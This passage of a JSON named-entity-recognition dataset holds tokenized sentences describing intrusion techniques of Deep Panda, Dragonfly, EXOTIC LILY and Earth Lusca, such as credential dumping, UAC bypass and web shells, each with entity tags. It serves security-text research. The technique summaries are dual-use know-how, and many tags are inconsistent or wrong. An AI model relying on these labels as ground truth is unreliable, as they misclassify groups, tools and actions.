"shortcut", - "to", - "disk", - "which", - "launches", - "a", - "shell", - "script", - "that", - "downloads", - "and", - "executes", - "a", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "has", - "used", - "the", - "sticky-keys", - "technique", - "to", - "bypass", - "the", - "RDP", - "login", - "screen", - "on", - "remote", - "systems", - "during", - "intrusions." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "has", - "used", - "<code>-w", - "hidden</code>", - "to", - "conceal", - "PowerShell", - "windows", - "by", - "setting", - "the", - "WindowStyle", - "parameter", - "to", - "hidden." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "has", - "updated", - "and", - "modified", - "its", - "malware,", - "resulting", - "in", - "different", - "hash", - "values", - "that", - "evade", - "detection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "has", - "used", - "PowerShell", - "scripts", - "to", - "download", - "and", - "execute", - "programs", - "in", - "memory,", - "without", - "writing", - "to", - "disk." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "uses", - "the", - "Microsoft", - "Tasklist", - "utility", - "to", - "list", - "processes", - "running", - "on", - "systems." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "has", - "used", - "regsvr32.exe", - "to", - "execute", - "a", - "server", - "variant", - "of", - "Derusbi", - "in", - "victim", - "networks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "has", - "used", - "ping", - "to", - "identify", - "other", - "machines", - "of", - "interest." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "uses", - "net.exe", - "to", - "connect", - "to", - "network", - "shares", - "using", - "<code>net", - "use</code>", - "commands", - "with", - "compromised", - "credentials." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deep", - "Panda", - "uses", - "Web", - "shells", - "on", - "publicly", - "accessible", - "Web", - "servers", - "to", - "access", - "victim", - "networks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Deep", - "Panda", - "group", - "is", - "known", - "to", - "utilize", - "WMI", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "added", - "newly", - "created", - "accounts", - "to", - "the", - "administrators", - "group", - "to", - "maintain", - "elevated", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "compressed", - "data", - "into", - ".zip", - "files", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "attempted", - "to", - "brute", - "force", - "credentials", - "to", - "gain", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "collected", - "open", - "source", - "information", - "to", - "identify", - "relationships", - "between", - "organizations", - "for", - "targeting", - "purposes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "cleared", - "Windows", - "event", - "logs", - "and", - "other", - "logs", - "produced", - "by", - "tools", - "they", - "used,", - "including", - "system,", - "security,", - "terminal", - "services,", - "remote", - "services,", - "and", - "audit", - "logs.", - "The", - "actors", - "also", - "deleted", - "specific", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "I-Tool", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "the", - "command", - "line", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "placed", - "trojanized", - "installers", - "for", - "control", - "system", - "software", - "on", - "legitimate", - "vendor", - "app", - "stores." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "collected", - "data", - "from", - "local", - "victim", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "disabled", - "host-based", - "firewalls.", - "The", - "group", - "has", - "also", - "globally", - "opened", - "port", - "3389." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "batch", - "scripts", - "to", - "enumerate", - "users", - "on", - "a", - "victim", - "domain", - "controller." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "batch", - "scripts", - "to", - "enumerate", - "administrators", - "and", - "users", - "in", - "the", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "registered", - "domains", - "for", - "targeting", - "intended", - "victims." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "compromised", - "targets", - "via", - "strategic", - "web", - "compromise", - "(SWC)", - "utilizing", - "a", - "custom", - "exploit", - "kit." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "compromised", - "websites", - "to", - "redirect", - "traffic", - "and", - "to", - "host", - "exploit", - "kits." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "conducted", - "SQL", - "injection", - "attacks,", - "exploited", - "vulnerabilities", - "CVE-2019-19781", - "and", - "CVE-2020-0688", - "for", - "Citrix", - "and", - "MS", - "Exchange,", - "and", - "CVE-2018-13379", - "for", - "Fortinet", - "VPNs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "I-OffAct", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "exploited", - "CVE-2011-0611", - "in", - "Adobe", - "Flash", - "Player", - "to", - "gain", - "execution", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "exploited", - "a", - "Windows", - "Netlogon", - "vulnerability", - "(CVE-2020-1472)", - "to", - "obtain", - "access", - "to", - "Windows", - "Active", - "Directory", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "B-Features", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "VPNs", - "and", - "Outlook", - "Web", - "Access", - "(OWA)", - "to", - "maintain", - "access", - "to", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "deleted", - "many", - "of", - "its", - "files", - "used", - "during", - "operations", - "as", - "part", - "of", - "cleanup,", - "including", - "removing", - "applications", - "and", - "deleting", - "screenshots." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "SMB", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "a", - "batch", - "script", - "to", - "gather", - "folder", - "and", - "file", - "names", - "from", - "victim", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "gathered", - "hashed", - "user", - "credentials", - "over", - "SMB", - "using", - "spearphishing", - "attachments", - "with", - "external", - "resource", - "links", - "and", - "by", - "modifying", - ".LNK", - "file", - "icon", - "resources", - "to", - "collect", - "credentials", - "from", - "virtualized", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "modified", - "the", - "Registry", - "to", - "hide", - "created", - "user", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "copied", - "and", - "installed", - "tools", - "for", - "operations", - "once", - "in", - "the", - "victim", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "dropped", - "and", - "executed", - "SecretsDump", - "to", - "dump", - "password", - "hashes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "created", - "accounts", - "on", - "victims,", - "including", - "administrator", - "accounts,", - "some", - "of", - "which", - "appeared", - "to", - "be", - "tailored", - "to", - "each", - "individual", - "staging", - "target." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "created", - "a", - "directory", - "named", - "\"out\"", - "in", - "the", - "user's", - "%AppData%", - "folder", - "and", - "copied", - "files", - "to", - "it." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "various", - "forms", - "of", - "spearphishing", - "in", - "attempts", - "to", - "get", - "users", - "to", - "open", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "created", - "accounts", - "disguised", - "as", - "legitimate", - "backup", - "and", - "service", - "accounts", - "as", - "well", - "as", - "an", - "email", - "administration", - "account." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "modified", - "the", - "Registry", - "to", - "perform", - "multiple", - "techniques", - "through", - "the", - "use", - "of", - "Reg." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "dropped", - "and", - "executed", - "SecretsDump", - "to", - "dump", - "password", - "hashes.", - "They", - "also", - "obtained", - "ntds.dit", - "from", - "domain", - "controllers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "identified", - "and", - "browsed", - "file", - "servers", - "in", - "the", - "victim", - "network,", - "sometimes", - ",", - "viewing", - "files", - "pertaining", - "to", - "ICS", - "or", - "Supervisory", - "Control", - "and", - "Data", - "Acquisition", - "(SCADA)", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "dropped", - "and", - "executed", - "tools", - "used", - "for", - "password", - "cracking,", - "including", - "Hydra", - "and", - "CrackMapExec." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "PowerShell", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "various", - "types", - "of", - "scripting", - "to", - "perform", - "operations,", - "including", - "Python", - "scripts.", - "The", - "group", - "was", - "observed", - "installing", - "Python", - "2.7", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "queried", - "the", - "Registry", - "to", - "identify", - "victim", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "added", - "the", - "registry", - "value", - "ntdll", - "to", - "the", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "moved", - "laterally", - "via", - "RDP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "accessed", - "email", - "accounts", - "using", - "Outlook", - "Web", - "Access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "likely", - "obtained", - "a", - "list", - "of", - "hosts", - "in", - "the", - "victim", - "environment." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "scheduled", - "tasks", - "to", - "automatically", - "log", - "out", - "of", - "created", - "accounts", - "every", - "8", - "hours", - "as", - "well", - "as", - "to", - "execute", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "performed", - "screen", - "captures", - "of", - "victims,", - "including", - "by", - "using", - "a", - "tool,", - "scr.exe", - "(which", - "matched", - "the", - "hash", - "of", - "ScreenUtil)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "dropped", - "and", - "executed", - "SecretsDump", - "to", - "dump", - "password", - "hashes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "compromised", - "legitimate", - "websites", - "to", - "host", - "C2", - "and", - "malware", - "modules." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "sent", - "emails", - "with", - "malicious", - "attachments", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "spearphishing", - "with", - "Microsoft", - "Office", - "attachments", - "to", - "enable", - "harvesting", - "of", - "user", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "spearphishing", - "with", - "PDF", - "attachments", - "containing", - "malicious", - "links", - "that", - "redirected", - "to", - "credential", - "harvesting", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "batch", - "scripts", - "to", - "enumerate", - "network", - "information,", - "including", - "information", - "about", - "trusts,", - "zones,", - "and", - "the", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "used", - "the", - "command", - "<code>query", - "user</code>", - "on", - "victim", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "injected", - "SMB", - "URLs", - "into", - "malicious", - "Word", - "spearphishing", - "attachments", - "to", - "initiate", - "Forced", - "Authentication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz,", - "CrackMapExec,", - "and", - "PsExec." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "compromised", - "user", - "credentials", - "and", - "used", - "valid", - "accounts", - "for", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "acquired", - "VPS", - "infrastructure", - "for", - "use", - "in", - "malicious", - "campaigns." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "scanned", - "targeted", - "systems", - "for", - "vulnerable", - "Citrix", - "and", - "Microsoft", - "Exchange", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "commonly", - "created", - "Web", - "shells", - "on", - "victims'", - "publicly", - "accessible", - "email", - "and", - "web", - "servers,", - "which", - "they", - "used", - "to", - "maintain", - "access", - "to", - "a", - "victim", - "network", - "and", - "download", - "additional", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Dragonfly", - "has", - "used", - "various", - "types", - "of", - "scripting", - "to", - "perform", - "operations,", - "including", - "batch", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "registered", - "domains", - "to", - "spoof", - "targeted", - "organizations", - "by", - "changing", - "the", - "top-level", - "domain", - "(TLD)", - "to", - "“.us”,", - "“.co”", - "or", - "“.biz”." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "created", - "e-mail", - "accounts", - "to", - "spoof", - "targeted", - "organizations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "gathered", - "targeted", - "individuals'", - "e-mail", - "addresses", - "through", - "open", - "source", - "research", - "and", - "website", - "contact", - "forms." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "used", - "malicious", - "documents", - "containing", - "exploits", - "for", - "CVE-2021-40444", - "affecting", - "Microsoft", - "MSHTML." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "gained", - "execution", - "through", - "victims", - "clicking", - "on", - "malicious", - "LNK", - "files", - "contained", - "within", - "ISO", - "files,", - "which", - "can", - "execute", - "hidden", - "DLLs", - "within", - "the", - "ISO." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "used", - "malicious", - "links", - "to", - "lure", - "users", - "into", - "executing", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "searched", - "for", - "information", - "on", - "targeted", - "individuals", - "on", - "business", - "databases", - "including", - "RocketReach", - "and", - "CrunchBase." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "used", - "contact", - "forms", - "on", - "victim", - "websites", - "to", - "generate", - "phishing", - "e-mails." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "copied", - "data", - "from", - "social", - "media", - "sites", - "to", - "impersonate", - "targeted", - "individuals." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "established", - "social", - "media", - "profiles", - "to", - "mimic", - "employees", - "of", - "targeted", - "companies." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "conducted", - "an", - "e-mail", - "thread-hijacking", - "campaign", - "with", - "malicious", - "ISO", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Org", - "B-OffAct", - "O", - "O", - "B-Tool", - "B-Tool" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "relied", - "on", - "victims", - "to", - "open", - "malicious", - "links", - "in", - "e-mails", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "used", - "the", - "e-mail", - "notification", - "features", - "of", - "legitimate", - "file", - "sharing", - "services", - "for", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "uploaded", - "malicious", - "payloads", - "to", - "file-sharing", - "services", - "including", - "TransferNow,", - "TransferXL,", - "WeTransfer,", - "and", - "OneDrive." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "EXOTIC", - "LILY", - "has", - "used", - "file-sharing", - "services", - "including", - "WeTransfer,", - "TransferNow,", - "and", - "OneDrive", - "to", - "deliver", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "WinRAR", - "to", - "compress", - "stolen", - "files", - "into", - "an", - "archive", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "the", - "Fodhelper", - "UAC", - "bypass", - "technique", - "to", - "gain", - "elevated", - "privileges." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "a", - "<code>DCSync</code>", - "command", - "with", - "Mimikatz", - "to", - "retrieve", - "credentials", - "from", - "an", - "exploited", - "controller." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", 